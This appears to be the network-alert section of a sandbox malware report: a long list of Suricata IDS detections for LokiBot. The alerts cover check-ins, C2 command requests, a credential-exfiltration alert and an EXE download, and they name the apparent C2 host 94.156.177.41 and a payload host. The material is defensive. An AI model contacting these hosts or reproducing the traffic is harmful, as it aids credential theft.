                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49218 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49194
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49208
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49218 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49218 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49218 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49218 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49188
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49176
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49173
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49186
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49198
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49187
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49218
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49235 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49246 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49246 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49246 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49214
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49256 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49222 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49196
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49222 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49222 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49180
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49276 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49276 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49276 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49249 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49246 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49246 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49246
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49254
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49203
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49174
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.231:80 -> 192.168.2.22:49170
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49235
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49200
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49193
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49279 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49279 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49279 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49223 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49223 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49216 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49216 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49261
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49216 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49223 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49222 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49274 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49276 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49222 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49243 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49274 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49276 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49213
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49201
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49249 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49223 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49253 -> 94.156.177.41:80
